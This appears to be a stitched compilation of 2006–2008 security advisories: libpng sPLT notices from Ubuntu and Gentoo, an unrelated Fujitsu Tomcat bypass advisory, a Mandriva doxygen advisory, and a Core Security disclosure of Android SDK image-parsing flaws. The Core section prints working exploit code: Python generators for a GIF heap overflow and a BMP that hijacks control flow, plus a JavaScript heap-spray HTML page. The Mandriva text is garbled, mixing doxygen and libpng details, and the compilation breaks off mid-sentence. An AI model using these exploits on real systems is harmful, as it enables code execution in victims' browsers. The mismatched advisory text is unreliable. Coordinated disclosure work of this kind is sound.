malformed sPLT chunks that trigger an out-of-bounds read. In the PNG (Portable Network Graphics) image processing library libpng, the sPLT chunk processing code in the png_set_sPLT() function has a problem in which a memory access violation occurs while processing a PNG image. Browsing a crafted png file placed on a web site or attached to an email may result in an interruption of service (DoS). The \u0027libpng\u0027 graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. \nAttackers may exploit this vulnerability to crash an application that relies on the affected library. 
=========================================================== \nUbuntu Security Notice USN-383-1 November 16, 2006\nlibpng vulnerability\nCVE-2006-5793\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 5.10\nUbuntu 6.06 LTS\nUbuntu 6.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 5.10:\n libpng10-0 1.0.18-1ubuntu3.1\n\nUbuntu 6.06 LTS:\n libpng12-0 1.2.8rel-5ubuntu0.1\n\nUbuntu 6.10:\n libpng12-0 1.2.8rel-5.1ubuntu0.1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nTavis Ormandy discovered that libpng did not correctly calculate the \nsize of sPLT structures when reading an image. \n\n
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 200611-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libpng: Denial of Service\n Date: November 17, 2006\n Bugs: #154380\n ID: 200611-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA vulnerability in libpng may allow a remote attacker to crash\napplications that handle untrusted images. 
\n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.2.13 \u003e= 1.2.13\n\nDescription\n===========\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered that a\nvulnerability exists in the sPLT chunk handling code of libpng, a large\nsPLT chunk may cause an application to attempt to read out of bounds. \n\nImpact\n======\n\nA remote attacker could craft an image that when processed or viewed by\nan application using libpng causes the application to terminate\nabnormally. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.2.13\"\n\nReferences\n==========\n\n [ 1 ] CVE-2006-5793\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-200611-09.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2006 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. 
----------------------------------------------------------------------\n\nTITLE:\nFUJITSU Interstage Products Apache Tomcat Security Bypass\n\nSECUNIA ADVISORY ID:\nSA32234\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/32234/\n\nCRITICAL:\nNot critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nInterstage Application Server 6.x\nhttp://secunia.com/advisories/product/13693/\nInterstage Application Server 7.x\nhttp://secunia.com/advisories/product/13692/\nInterstage Application Server 8.x\nhttp://secunia.com/advisories/product/13685/\nInterstage Application Server 9.x\nhttp://secunia.com/advisories/product/15986/\nInterstage Apworks 6.x\nhttp://secunia.com/advisories/product/13688/\nInterstage Apworks 7.x\nhttp://secunia.com/advisories/product/13689/\nInterstage Studio 8.x\nhttp://secunia.com/advisories/product/13690/\nInterstage Studio 9.x\nhttp://secunia.com/advisories/product/15610/\nInterstage Business Application Server 8.x\nhttp://secunia.com/advisories/product/13687/\nInterstage Job Workload Server 8.x\nhttp://secunia.com/advisories/product/13686/\n\nDESCRIPTION:\nA security issue has been reported in various FUJITSU Interstage\nproducts, which potentially can be exploited by malicious people to\nbypass certain security restrictions. \n\nThe security issue is caused due to a synchronisation problem when\nchecking IP addresses and can be exploited to bypass a filter valve\nthat extends \"RemoteFilterValve\" and potentially gain access to\nprotected contexts. \n\nSOLUTION:\nPatches are scheduled for release. \n\nUse a proxy or firewall to protect resources. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. 
\n\nORIGINAL ADVISORY:\nFUJITSU:\nhttp://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html\n\nJVN:\nhttp://jvn.jp/en/jp/JVN30732239/index.html\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n \n Mandriva Linux Security Advisory MDKSA-2006:212\n http://www.mandriva.com/security/\n _______________________________________________________________________\n \n Package : doxygen\n Date : November 16, 2006\n Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0\n _______________________________________________________________________\n \n Problem Description:\n \n Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-3334)\n\n It is questionable whether this issue is actually exploitable, but the\n patch to correct the issue has been included in versions \u003c 1.2.12. (CVE-2006-5793)\n\n In addition, an patch to address several old vulnerabilities has been\n applied to this build. 
(CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\n CAN-2004-0598, CAN-2004-0599)\n\n Packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n 
_______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q\npK8OJ2vhx3DqZ400EPH5QMw=\n=R8Jo\n-----END PGP SIGNATURE-----\n\n. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs\n\nMultiple vulnerabilities in Google\u0027s Android SDK\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in Google\u0027s Android SDK\nAdvisory ID: CORE-2008-0124\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2148\nDate published: 2008-03-04\nDate of last update: 2008-03-04\nVendors contacted: Google\nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Heap overflow, integer overflow\nRemotely Exploitable: No\nLocally Exploitable: No\nBugtraq ID: 28006, 28005\t\nCVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,\nCVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269\t\n\n\n*Vulnerability Description*\n\nAndroid is a project promoted primarily by Google through the Open Handset\nAlliance aimed at providing a complete set of software for mobile\ndevices: an operating system, middleware and key mobile applications\n[1]. Although the project is currently in a development phase and has\nnot made an official release yet, several vendors of mobile chips have\nunveiled prototype phones built using development releases of the\nplatform at the Mobile World Congress [2]. Development using the Android\nplatform gained activity early in 2008 as a result of Google\u0027s launch of\nthe Android Development Challenge which includes $10 million USD in\nawards [3] for which a Software Development Kit (SDK) was made available\nin November 2007. \n\n The Android Software Development Kit includes a fully functional\noperating system, a set of core libraries, application development\nframeworks, a virtual machine for executing applications and a phone\nemulator based on the QEMU emulator [4]. Public reports as of February\n27th, 2008 state that the Android SDK has been downloaded 750,000 times\nsince November 2007 [5]. 
\n\n Several vulnerabilities have been found in Android\u0027s core libraries for\nprocessing graphic content in some of the most used image formats (PNG,\nGIF and BMP). While some of these vulnerabilities stem from the use of\noutdated and vulnerable open source image processing libraries others\nwere introduced by native Android code that uses them or that implements\nnew functionality. \n\n Exploitation of these vulnerabilities to yield complete control of a\nphone running the Android platform has been proved possible using the\nemulator included in the SDK, which emulates a phone running the Android\nplatform on an ARM microprocessor. \n\n This advisory contains technical descriptions of these security bugs,\nincluding a proof of concept exploit to run arbitrary code, proving the\npossibility of running code on Android stack (over an ARM architecture)\nvia a binary exploit. \n\n\n\n\n*Vulnerable Packages*\n\n. Android SDK m3-rc37a and earlier are vulnerable to several bugs in\ncomponents that process GIF, PNG and BMP images (bugs #1, #2 and #3 of\nthis advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component\nthat processes BMP images (bug #3). \n\n\n*Non-vulnerable Packages*\n\n. Android SDK m5-rc15\n\n\n*Vendor Information, Solutions and Workarounds*\n\nVendor statement:\n\n\"The current version of the Android SDK is an early look release to the\nopen source community, provided so that developers can begin working\nwith the platform to inform and shape our development of Android toward\nproduction readiness. The Open Handset Alliance welcomes input from the\nsecurity community throughout this process. There will be many changes\nand updates to the platform before Android is ready for end users,\nincluding a full security review.\"\n\n\n*Credits*\n\nThese vulnerabilities were discovered by Alfredo Ortega from Core\nSecurity Technologies, leading his Bugweek 2007 team called \"Pampa\nGrande\". It was researched in depth by Alfredo Ortega. 
\n\n\n*Technical Description / Proof of Concept Code*\n\nAndroid is a software stack for mobile devices that includes an\noperating system, middleware and key applications. Android relies on\nLinux version 2.6 for core system services such as security, memory\nmanagement, process management, network stack, and driver model. The\nkernel also acts as an abstraction layer between the hardware and the\nrest of the software stack. \n\n The WebKit application framework is included to facilitate development\nof web client application functionality. The framework in turn uses\ndifferent third-party open source libraries to implement processing of\nseveral image formats. \n\n Android includes a web browser based on the Webkit framework that\ncontains multiple binary vulnerabilities when processing .GIF, .PNG and\n.BMP image files, allowing malicious client-side attacks on the web\nbrowser. A client-side attack could be launched from a malicious web\nsite, hosting specially crafted content, with the possibility of\nexecuting arbitrary code on the victim\u0027s Android system. \n\n These client-side binary vulnerabilities were discovered using the\nAndroid SDK that includes an ARM architecture emulator. Binary\nvulnerabilities are the most common security bugs in computer software. \nBasic bibliography on these vulnerabilities includes a recently updated\nhandbook about security holes that also describes current\nstate-of-the-art exploitation techniques for different hardware\nplatforms and operating systems [6]. \n\n The vulnerabilities discovered are summarized below grouped by the type\nof image file format that is parsed by the vulnerable component. \n\n #1 - GIF image parsing heap overflow\n\nThe Graphics Interchange Format (GIF) is an image format dating at least\nfrom 1989 [7]. 
It was popularized because GIF images can be compressed\nusing the Lempel-Ziv-Welch (LZW) compression technique thus reducing the\nmemory footprint and bandwidth required for transmission and storage. \n\n A memory corruption condition happens within the GIF processing library\nof the WebKit framework when the function \u0027GIFImageDecoder::onDecode()\u0027\nallocates a heap buffer based on the _Logical Screen Width and Height_\nfield of the GIF header (offsets 6 and 8) and then the resulting buffer\nis filled in with an amount of data bytes that is calculated based on\nthe real Width and Height of the GIF image. There is a similar (if not\nthe same) bug in the function \u0027GIFImageDecoder::haveDecodedRow()\u0027 in the\nopen-source version included by Android in\n\u0027WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\gif\\GifImageDecoder.cpp\u0027\ninside \u0027webkit-522-android-m3-rc20.tar.gz\u0027 available at [8]. \n\n Detailed analysis:\n\n When the process \u0027com.google.android.browser\u0027 must handle content with\na GIF file it loads a dynamic library called \u0027libsgl.so\u0027 which contains\nthe decoders for multiple image file formats. \n\n Decoding of the GIF image is performed correctly by the library giflib\n4.0 (compiled inside \u0027libsgl.so\u0027). However, the wrapper object\n\u0027GIFImageDecoder\u0027 miscalculates the total size of the image. \n\n First, the Logical Screen Size is read and stored in the following\ncalling sequence (As giflib is an Open Source MIT-licenced library, the\nsource was available for analysis):\n\u0027GIFImageDecoder::onDecode()-\u003eDGifOpen()-\u003eDGifGetScreenDesc()\u0027. The last\nfunction, \u0027DGifGetScreenDesc()\u0027, stores the _Logical Screen Width and\nHeight_ in a structure called \u0027GifFileType\u0027:\n\n/-----------\n\nInt DGifGetScreenDesc(GifFileType * GifFile) {\n... 
\n/* Put the screen descriptor into the file: */\nif (DGifGetWord(GifFile, \u0026GifFile-\u003eSWidth) == GIF_ERROR ||\nDGifGetWord(GifFile, \u0026GifFile-\u003eSHeight) == GIF_ERROR)\n return GIF_ERROR;\n ... \n }\n- -----------/\n\n We can see that the fields are stored in the first 2 words of the\nstructure:\n\n/-----------\n\ntypedef struct GifFileType {\n/* Screen dimensions. */\nGifWord SWidth, SHeight,\n... \n}\n- -----------/\n\n In the disassembly of the GIFImageDecoder::onDecode() function provided\nbelow we can see how the DGifOpen() function is called and that the\nreturn value (A GifFileType struct) is stored on the $R5 ARM register:\n\n/-----------\n\n.text:0002F234 BL _DGifOpen\n.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5\n- -----------/\n\n Then, the giflib function \u0027DGifSlurp()\u0027 is called and the Image size is\ncorrectly allocated using the Image Width and Height and not the Logical\nScreen Size:\n\n/-----------\n\nInt DGifSlurp(GifFileType * GifFile)\n{ ... ImageSize = sp-\u003eImageDesc.Width * sp-\u003eImageDesc.Height;\n sp-\u003eRasterBits = (unsigned char *)malloc(ImageSize *\nsizeof(GifPixelType));\n ... 
\n}\n- -----------/\n\n Afterwards the _Logical Screen_ Width and Height are stored in the R9\nand R11 registers:\n\n/-----------\n\n.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !\n- -----------/\n\n\n\n However the actual image may be much larger than these sizes that are\nincorrectly passed to a number of methods of the \u0027GIFImageDecoder\u0027:\n\n/-----------\n\nImageDecoder::chooseFromOneChoice():\n.text:0002F294 MOV R0, R8\n.text:0002F298 MOV R1, #3\n.text:0002F29C MOV R2, R9\n.text:0002F2A0 MOV R3, R11\n.text:0002F2A4 STR R12, [SP,#0x48+var_3C]\n.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;\nImageDecoder::chooseFromOneChoice(SkBitmap::Config,int\n,int)\n\nBitmap::setConfig():\n.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap\n.text:0002F2BC MOV R1, #3\n.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !\n.text:0002F2C4 MOV R3, R11\n.text:0002F2C8 STR R10, [SP,#0x48+var_48]\n.text:0002F2CC BL _Bitmap9setConfig ;\nBitmap::setConfig(SkBitmap::Config,uint,uint,uint)\n- -----------/\n\n This function stores the SWidth and SHeight inside the Bitmap object as\nshown in the following code snippet:\n\n/-----------\n\n.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7\n.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8\n.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap\n- -----------/\n\n And later:\n\n/-----------\n\n.text:00035C58 BL _Bitmap15ComputeRowBytes ;\nSkBitmap::ComputeRowBytes(SkBitmap::Config,uint)\n.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes\n.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth\n.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight\n.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes\n- -----------/\n\n The following python script generates a GIF file that causes the\noverflow. It requires the Python Imaging Library. 
Once the GIF\nfile has been generated, it must be opened in the Android browser to trigger the overflow:\n\n/-----------\n\n##Android Heap Overflow\n##Ortega Alfredo _ Core Security Exploit Writers Team\n##tested against Android SDK m3-rc37a\n\nimport Image\nimport struct\n\n#Creates a _good_ gif image\nimagename=\u0027overflow.gif\u0027\nstr = \u0027\\x00\\x00\\x00\\x00\u0027*30000\nim = Image.frombuffer(\u0027L\u0027,(len(str),1),str,\u0027raw\u0027,\u0027L\u0027,0,1)\nim.save(imagename,\u0027GIF\u0027)\n\n#Shrink the Logical screen dimension\nSWidth=1\nSHeight=1\n\nimg = open(imagename,\u0027rb\u0027).read()\nimg = img[:6]+struct.pack(\u0027\u003cHH\u0027,SWidth,SHeight)+img[10:]\n\n#Save the _bad_ gif image\nq=open(imagename,\u0027wb\u0027)\nq.write(img)\nq.close()\n- -----------/\n\n This security bug affects Android SDK m3-rc37a and earlier versions. \nVersion m5-rc14 of the Android SDK includes a fix and is not vulnerable\nto this bug. \n\n #2 - PNG image parsing, multiple vulnerabilities:\n\n The Portable Network Graphics (PNG) is a bitmapped image format that\nemploys lossless data compression [9]. PNG was created to improve upon\nand replace the GIF format as an image file format that does not require\na patent license. \n\n The library \u0027libsgl.so\u0027 used by Android\u0027s WebKit contains commonly used\ncode to load graphic files, such as libpng, giflib and others. The version\ninside libsgl.so distributed with Android SDK m3-rc37a and earlier\nversions includes the string \u0027\"libpng version 1.2.8 - December 3, 2004\"\u0027. \nSource code inspection of the file\n\u0027\\WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\png\\png.c\u0027 included\nin the \u0027webkit-522-android-m3-rc20.tar.gz\u0027 release of the Android\nproject reveals that \u0027\"libpng version 1.2.7 - September\n 12, 2004\"\u0027 has been used in this release. 
\n\n This old version of libpng makes Android SDK m3-rc37a and earlier\nversions vulnerable to the following known issues: \u0027 CVE-2006-5793,\nCVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,\nCVE-2007-5269 \u0027. \n\nAndroid version m5-rc14 has been updated to include libpng 1.2.24 and is\nlikely not vulnerable. \n\n #3 - BMP image processing, negative offset integer overflow:\n\n The BMP file format, sometimes called bitmap or DIB file format (for\ndevice-independent bitmap), is an image file format used to store bitmap\ndigital images, especially on Microsoft Windows and OS/2 operating\nsystems [10]. \n\n The integer overflow is caused when a Windows Bitmap file (.BMP) header\nis parsed in the method \u0027BMP::readFromStream(Stream *,\n ImageDecoder::Mode)\u0027 inside the \u0027libsgl.so\u0027 library. When the\nvalue of the \u0027offset\u0027 field of the BMP file header is negative and the\nBitmap Information section (DIB header) specifies an image of 8 bits per\npixel (8 bpp) the parser will try to allocate a palette, and will use\nthe negative offset to calculate the size of the palette. \n\n The following code initializes the palette with the color white\n(\u00270x00ffffff\u0027) but with a carefully chosen negative offset it can be\nmade to overwrite any address of the process with that value. 
Because\nthe BMP decoder source wasn\u0027t released, a disassembly of the binary\nincluded by Android is provided below:\n\n/-----------\n\n.text:0002EE38 MOV LR, R7 ; R7 is the negative offset\n.text:0002EE3C MOV R12, R7,LSL#2\n.text:0002EE40\n.text:0002EE40 loc_2EE40\n.text:0002EE40 LDR R3, [R10,#0x10]\n.text:0002EE44 ADD LR, LR, #1\n.text:0002EE48 MOVL R2, 0xFFFFFFFF\n.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the\nsame bug) but ranges 0x10000-0x20000\n.text:0002EE50 MOV R0, #0\n.text:0002EE54 CMP LR, R9\n.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+R3 (equals R1)\n.text:0002EE5C STRB R2, [R1,#2]\n.text:0002EE60 STRB R0, [R1,#3]\n.text:0002EE64 STRB R2, [R1,#1]\n.text:0002EE68 ADD R12, R12, #4\n.text:0002EE6C BNE loc_2EE40\n- -----------/\n\n Now, let\u0027s take a look at the memory map of the Android browser:\n\n/-----------\n\n# ps\nps\nUSER PID PPID VSIZE RSS WCHAN PC NAME\nroot 1 0 248 64 c0084edc 0000ae2c S /init\nroot 2 0 0 0 c0049168 00000000 S kthreadd\n... \nroot 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb\napp_0 1574 535 83564 12832 ffffffff afe0c79c S\ncom.google.android.browser\nroot 1600 587 840 324 00000000 afe0bfbc R ps\n# cat /proc/1574/maps\ncat /proc/1574/maps\n00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process\n0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]\n08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)\n... \n#\n- -----------/\n\n We can see that the heap is located in the range \u00270000a000-00c73000\u0027\nand it is executable. Overwriting this area will allow redirecting\nexecution flow if there is a virtual table stored in the heap. 
Later on\nthe same method we can see that a call to the \"Stream\" Object VT is made:\n\n/-----------\n\n.text:0002EB64 LDR R12, [R8] # R8 is the \"this\" pointer of the Stream Object\n.text:0002EB68 MOV R0, R8\n.text:0002EB6C MOV LR, PC\n.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10\n- -----------/\n\n Because the \"Stream\" Object (R8) is stored on the heap and we can fill\nthe heap with the white color \u0027\n 0x00ffffff\u0027 we can load the Program Counter with the value at\n\u00270xffffff+0x10\u0027. The following python script will generate a BMP to\naccomplish that:\n\n/-----------\n\n# This script generates a Bitmap file that makes the Android browser\njump to the address at 0xffffff+0x10\n# Must be loaded inside a HTML file with a tag like this: \u0026lt;IMG\nsrc=badbmp.bmp\u0026gt;\n# Alfredo Ortega - Core Security\nimport struct\n\noffset = 0xffef0000\nwidth = 0x0bffff\nheight=8\n\nbmp =\"\\x42\\x4d\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",offset)\nbmp+=\"\\x28\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",width)\nbmp+=struct.pack(\"\u003cI\",height)\nbmp+=\"\\x03\\x00\\x08\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x55\\x02\\xff\\x00\\x02\\x00\\x02\\x02\\xff\"\nbmp+=\"\\xff\\x11\\xff\\x33\\xff\\x55\\xff\\x66\\xff\\x77\\xff\\x88\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nbmp+=\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nopen(\"badbmp.bmp\",\"wb\").write(bmp)\n- -----------/\n\n Opening the BMP file generated with this script inside a HTML page will\ncause (sometimes, as it is dependent on an uninitialized variable) the\nfollowing output of the gdb debugger:\n\n/-----------\n\n(gdb) attach 
1574\nattach 1574\nAttaching to program: /system/bin/app_process, process 1574\n... \n0xafe0d204 in __futex_wait () from /system/lib/libc.so\n(gdb) c\nContinuing. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x00000000 in ?? ()\n(gdb)\n- -----------/\n\n Here the browser process has jumped to the \u00270x00000000\u0027 address because\nthat is the value at 0x00ffffff+0x10. We can change this value using\ncommon JavaScript heap-filling techniques. \n\n The complete exploit page follows:\n\n/-----------\n\n\u003cHTML\u003e\n\u003cHEAD\u003e\n\u003c/HEAD\u003e\n\u003cBODY\u003e\n\u003cscript type=\"text/javascript\"\u003e\n// Fill 0x200000 - 0xa00000 with Breakpoints\nvar nop = unescape(\"%u0001%uef9f\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c5;i++)\n document.write(nop)\n\n// Fill 0xa00000 - 0x1100000 with address 0x00400040\nvar nop = unescape(\"%u4000%u4000\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c2;i++)\n document.write(nop)\n\u003c/script\u003e\n\u003cIMG src=badbmp.bmp\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n- -----------/\n\n Because the exploit needs to fill over 16 MB of heap memory to reach\nthe address \u00270xffffff\u0027 it is very slow and the default memory\nconfiguration of Android will often abort the process before reaching\nthe desired point. To overcome this limitation for demonstration\npurposes one can launch the emulator with these parameters:\n\n\u0027emulator -qemu -m 192\u0027\n\n That will launch the Android emulator with 192 megabytes of memory,\nplenty for the exploit to work. \n\n This security bug affects Android SDK m5-rc14 and earlier versions. \n\n\n*Report Timeline*\n\n. 2008-01-30: Vendor is notified that possibly exploitable\nvulnerabilities were discovered and that an advisory draft is\navailable. This affects Android SDK m3-rc37a and earlier versions.\n. 2008-01-30: Vendor acknowledges and requests the draft. 
\n. 2008-01-31: Core sends the draft encrypted, including PoC code to\ngenerate malformed GIF images.\n. 2008-01-31: Vendor acknowledges the draft.\n. 2008-02-02: Vendor notifies that the software is an early release for\nthe open source community, but agrees they can fix the problem on the\nestimated date (2008-02-25).\n. 2008-02-04: Core notifies the vendor that Android is using a\nvulnerable PNG processing library.\n. 2008-02-08: Vendor acknowledges, invites Core to send any new\nfindings and asks if all findings will be included in the advisory.\n. 2008-02-12: Core responds to vendor that all security issues found\nwill be included in the advisory; the date is subject to coordination.\n. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core\nreceives no notification.\n. 2008-02-13: Core sends the vendor more malformed images, including\nGIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release.\n. 2008-02-20: Core sends to the vendor a new version of the advisory,\nincluding a BMP PoC that runs arbitrary ARM code and informs the vendor\nthat we noticed that the recent m5-rc14 release fixed the GIF and PNG\nbugs. Publication of CORE-2008-0124 has been re-scheduled for February\n27th, 2008.\n. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been\nreleased and provides an official statement to the \"Vendor Section\" of\nthe advisory. A final review of the advisory is requested before its\nrelease. The vendor indicates that the Android SDK is still in\ndevelopment and stabilization won\u0027t happen until it gets closer to\nAlpha. Changes to fix the BMP issue are coming soon; priorities are\ngiven to issues listed in the public issue tracking system at\nhttp://code.google.com/p/android/issues\n. 2008-02-26: Core indicates that publication of CORE-2008-0124 has\nbeen moved to March 3rd 2008, asks if an estimated date for the BMP fix\nis available and if Core should file the reported and any future bugs\nin the public issue tracking page. 
\n. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to\nthe vendor as requested. Core requests any additional comments or\nstatements to be provided by noon March 3rd, 2008 (UTC-5)\n. 2008-03-01: Vendor requests publication to be delayed one day in\norder to publish a new release of Android with a fix to the BMP issue.\n. 2008-03-02: Core agrees to delay publication for one day.\n. 2008-03-03: Vendor releases Android SDK m5-rc15, which fixes the BMP\nvulnerability. Vendor indicates that Android applications run with\nthe credentials of an unprivileged user, which decreases the severity of\nthe issues found\n. 2008-03-04: Further research by Alfredo Ortega reveals that although\nthe vendor statement is correct, current versions of Android SDK ship\nwith a passwordless root account. Unprivileged users with shell access\ncan simply use the \u0027su\u0027 program to gain privileges\n. 2008-03-04: Advisory CORE-2008-0124 is published. \n\n\n*References*\n\n[1] Android Overview - Open Handset Alliance -\nhttp://www.openhandsetalliance.com/android_overview.html\n[2] \"Android Comes to Life in Barcelona\" - The Washington Post,\nFebruary 11th, 2008 -\nhttp://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html\n[3] Android Developer Challenge - http://code.google.com/android/adc.html\n[4] \"Test Center Preview: Inside Google\u0027s Mobile future\" - InfoWorld,\nFeb. 27th 2008 -\nhttp://www.infoworld.com/article/08/02/27/09TC-google-android_1.html\n[5] \"\u0027Allo, \u0027allo, Android\" - The Sydney Morning Herald, February 26th,\n2008 -\nhttp://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html\n[6] The Shellcoder\u0027s Handbook: Discovering and Exploiting Security Holes\nby Chris Anley, John Heasman, Felix Linder and Gerardo Richarte. 
\nWiley; 2nd edition (August 20, 2007) -\nhttp://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html\n[7] Graphics Interchange Format version 89a -\nhttp://www.w3.org/Graphics/GIF/spec-gif89a.txt\n[8] Android downloads page http://code.google.com/p/android/downloads/list\n[9] Portable Network Graphics (PNG) specification -\nhttp://www.w3.org/TR/PNG/\n[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, 